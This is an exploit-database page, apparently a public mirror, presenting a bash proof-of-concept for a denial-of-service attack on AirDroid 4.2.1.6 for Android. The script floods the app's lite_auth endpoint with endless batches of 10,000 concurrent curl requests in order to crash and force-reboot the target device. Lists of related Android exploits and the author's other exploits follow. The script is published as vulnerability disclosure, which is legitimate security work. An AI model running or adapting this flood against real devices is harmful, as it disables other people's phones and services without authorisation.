Search for hundreds of thousands of exploits

"AirDroid 4.2.1.6 - Denial of Service"

Author

Exploit author

s4vitar

Platform

Exploit platform

android

Release date

Exploit published date

2019-02-11

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
#!/bin/bash

# *********************************************************************
# *             Author: Marcelo Vázquez (aka s4vitar)                 *
# *  AirDroid Denial of Service (DoS) & System Crash + Forced Reboot  *
# *********************************************************************

# Exploit Title: AirDroid Remote Denial of Service (DoS) & System Crash + Forced Reboot
# Date: 2019-02-13
# Exploit Author: Marcelo Vázquez (aka s4vitar)
# Collaborators: Victor Lasa (aka vowkin)
# Vendor Homepage: https://web.airdroid.com/
# Software Link: https://play.google.com/store/apps/details?id=com.sand.airdroid&hl=en
# Version: <= AirDroid 4.2.1.6
# Tested on: Android

url=$1 # Example: http://192.168.1.46:8888
requests=0

trap ctrl_c INT

# If Ctrl+C key is pressed then the threads are killed
function ctrl_c() {
        echo -e "\n\n[*]Exiting...\n" && tput cnorm
        pkill curl > /dev/null 2>&1
        exit
}

# Detect number of arguments being passed to the program
if [ "$(echo $#)" == "1" ]; then
	# Infinite Loop
	tput cnorm && while true; do
		# We send 10000 requests in thread
		for i in $(seq 1 10000); do
			curl --silent "$url/sdctl/comm/lite_auth/" &
			let requests+=1
		done && wait # Here we wait for the threads to finish
	echo "Requests Sent: $requests"
	done
else
	echo -e "\nUsage: ./AirDroid_request.sh http://ip:port\n"
fi
Release DateTitleTypePlatformAuthor
2020-07-02"WhatsApp Remote Code Execution - Paper"webappsandroid"ashu Jaiswal"
2020-02-24"Android Binder - Use-After-Free (Metasploit)"localandroidMetasploit
2020-01-14"WeChat - Memory Corruption in CAudioJBM::InputAudioFrameToJBM"dosandroid"Google Security Research"
2020-01-14"Android - ashmem Readonly Bypasses via remap_file_pages() and ASHMEM_UNPIN"dosandroid"Google Security Research"
2019-11-08"Android Janus - APK Signature Bypass (Metasploit)"localandroidMetasploit
2019-10-16"Whatsapp 2.19.216 - Remote Code Execution"remoteandroid"Valerio Brussani"
2019-10-04"Android - Binder Driver Use-After-Free"localandroid"Google Security Research"
2019-08-30"Canon PRINT 2.5.5 - Information Disclosure"localandroid0x48piraj
2019-07-24"Android 7 < 9 - Remote Code Execution"remoteandroid"Marcin Kozlowski"
2019-07-15"Android 7 - 9 VideoPlayer - 'ihevcd_parse_pps' Out-of-Bounds Write"dosandroid"Marcin Kozlowski"
Release DateTitleTypePlatformAuthor
2019-10-16"X.Org X Server 1.20.4 - Local Stack Overflow"locallinuxs4vitar
2019-06-14"CentOS 7.6 - 'ptrace_scope' Privilege Escalation"locallinuxs4vitar
2019-06-10"Ubuntu 18.04 - 'lxd' Privilege Escalation"locallinuxs4vitar
2019-03-15"NetData 1.13.0 - HTML Injection"webappsmultiples4vitar
2019-02-28"FTP Server 1.32 - Denial of Service"dosandroids4vitar
2019-02-21"AirDrop 2.0 - Denial of Service (DoS)"dosandroids4vitar
2019-02-21"ScreenStream 3.0.15 - Denial of Service"dosandroids4vitar
2019-02-15"AirMore 1.6.1 - Denial of Service (PoC)"dosandroids4vitar
2019-02-14"ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (PoC)"dosandroids4vitar
2019-02-11"AirDroid 4.2.1.6 - Denial of Service"dosandroids4vitar
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46337/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.